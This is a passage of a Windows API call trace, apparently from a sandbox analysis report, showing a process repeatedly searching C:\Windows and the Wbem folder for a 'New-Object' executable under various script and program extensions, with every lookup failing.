ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.316] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.COM" (normalized: "c:\\windows\\new-object.com"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.317] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.317] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.317] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.EXE" (normalized: "c:\\windows\\new-object.exe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.317] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.317] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.317] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.318] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.BAT" (normalized: "c:\\windows\\new-object.bat"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.318] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.318] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.318] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.318] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.CMD" (normalized: "c:\\windows\\new-object.cmd"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.319] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.319] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.319] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.319] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.VBS" (normalized: "c:\\windows\\new-object.vbs"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.320] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.320] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.320] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.320] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.VBE" (normalized: "c:\\windows\\new-object.vbe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.321] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.321] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.321] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.321] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.JS" (normalized: "c:\\windows\\new-object.js"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.321] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.321] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.322] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.322] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.JSE" (normalized: "c:\\windows\\new-object.jse"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.322] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.322] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.322] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.322] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.WSF" (normalized: "c:\\windows\\new-object.wsf"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.323] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.323] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.323] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.323] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.WSH" (normalized: "c:\\windows\\new-object.wsh"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.323] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.323] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.324] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.324] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.MSC" (normalized: "c:\\windows\\new-object.msc"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.324] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.324] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.324] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.324] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.CPL" (normalized: "c:\\windows\\new-object.cpl"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.325] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.325] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.325] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.325] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object" (normalized: "c:\\windows\\new-object"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.326] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.326] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.ps1" (normalized: "c:\\windows\\system32\\wbem\\new-object.ps1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", 